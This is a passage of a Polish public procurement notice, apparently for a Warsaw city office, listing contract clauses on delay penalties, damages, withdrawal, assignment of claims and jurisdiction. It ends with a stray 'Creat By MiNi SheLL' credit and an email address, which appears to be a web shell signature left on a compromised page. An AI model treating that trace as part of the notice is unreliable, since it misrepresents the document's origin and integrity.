b/ za  zwłokę w usunięciu wad stwierdzonych podczas odbioru, w wysokości 0,2% wartości wynagrodzenia brutto umowy określonego w § 4 ust. 1 za każdy rozpoczęty dzień zwłoki, liczonej od dnia w którym prace miały być wykonane do dnia zgłoszenia wykonania prac, po którym nastąpił ich  odbiór przez Zamawiającego  bez zastrzeżeń.
c/ z tytułu wypowiedzenia umowy bez zachowania okresu wypowiedzenia przez Zamawiającego z przyczyn leżących po stronie Wykonawcy w wysokości 20% wynagrodzenia brutto, o którym mowa w § 4 ust. 1 umowy.
2. Wykonawca wyraża zgodę na potrącenie przez Zamawiającego kar umownych z należytego wynagrodzenia z tytułu wykonania niniejszej umowy bez dodatkowych wezwań do zapłaty.
§ 7
1.	Strony ustalają, że niezależnie od kar umownych, o których mowa § 6, Zamawiający będzie mógł dochodzić od Wykonawcy odszkodowania uzupełniającego do wysokości rzeczywiście poniesionej szkody na zasadach ogólnych przewidzianych w kodeksie cywilnym.
2.	Dokonane potrącenia i naliczone kary umownie nie zwalniają Wykonawcy z obowiązku wykonania prac zgodnie z umową.
§ 8
1. Strony umowy zgodnie ustalają, że Zamawiający może odstąpić od umowy w całości albo w niewykonanej części, bez wyznaczania terminu dodatkowego w szczególności z następujących przyczyn:
1/ zwłoki Wykonawcy w wykonaniu całości lub części prac przekraczającej 3 dni termin na ich wykonanie wskazany w oświadczeniu, o którym mowa w §5 ust.1  umowy bądź zwłoki w usunięciu wad w pracach, przekraczającej 3 dni, termin wskazany na ich usunięcie,
2/ zajęcia przez organ egzekucyjny wierzytelności Wykonawcy z tytułu wykonania niniejszej umowy.
2. Odstąpienie od umowy wymaga formy pisemnej pod rygorem nieważności.
3. W przypadku odstąpienia od umowy przez  Zamawiającego z winy Wykonawcy, Zamawiający jest zobowiązany do odbioru robót wykonanych do chwili ich przerwania.
4. Odstąpienie od umowy nie ma wpływu na możliwość żądania i dochodzenia przez Zamawiającego od Wykonawcy kar umownych wynikających z niniejszej umowy. 
§ 9
1.	Wszelkie oświadczenia Stron w wykonaniu postanowień niniejszej umowy, z zastrzeżeniem ewentualnych wyjątków przewidzianych w umowie, wymagają formy pisemnej i będą przesłane listem poleconym na adres strony, określony w umowie, za potwierdzeniem odbioru. Strony zobowiązują się do zawiadamiania o zmianie adresu do korespondencji natychmiast po dokonaniu takiej zmiany. W razie zaniedbania obowiązku zawiadomienia o zmianie adresu, korespondencje wysłaną na ostatni adres listem poleconym, za potwierdzeniem odbioru i nie odebraną, uważa się za doręczoną w dacie zwrotu korespondencji Stronie, która ją wysłała.
2.	Strony umowy zgodnie ustalają, iż Wykonawca bez zgody Zamawiającego wyrażonej pisemnie pod rygorem nieważności nie może dokonać na rzecz osoby trzeciej cesji wierzytelności, wynikającej z niniejszej umowy.
3.	Strony umowy stwierdzają, iż zapoznały się z umową i dokonały interpretacji jej poszczególnych  postanowień, w celu wyeliminowania ewentualnych, mogących powstać w przyszłości sporów na tle jej wykonania.
4.	Zamawiający oświadcza ,iż jest płatnikiem podatku VAT i posiada NIP 525-22-48-481.
§ 10
1.  Wykonanie niniejszej umowy nie wiąże się z przetwarzaniem danych w rozumieniu  
      ustawy o ochronie danych osobowych, dla których Administratorem Danych jest  
     Prezydent m. st. Warszawy, a co za tym idzie nie wiąże się z dostępem do  
     zasobów systemów informatycznych Urzędu m. st. Warszawy.
2. W sprawach nieuregulowanych niniejszą umową mają zastosowanie przepisy :
a/ ustawy Prawo zamówień publicznych 
b/ kodeksu cywilnego 
3.W przypadku powstania sporu na tle realizacji niniejszej umowy do rozpoznania sporu  
    będzie Sąd właściwy miejscowo dla Zamawiającego.
4.Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.
5.Umowę niniejszą oraz załączniki stanowiące integralną część umowy sporządzono w trzech jednobrzmiących egzemplarzach - 1 egz. dla Wykonawcy, 2 egz. dla Zamawiającego.</p>

<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com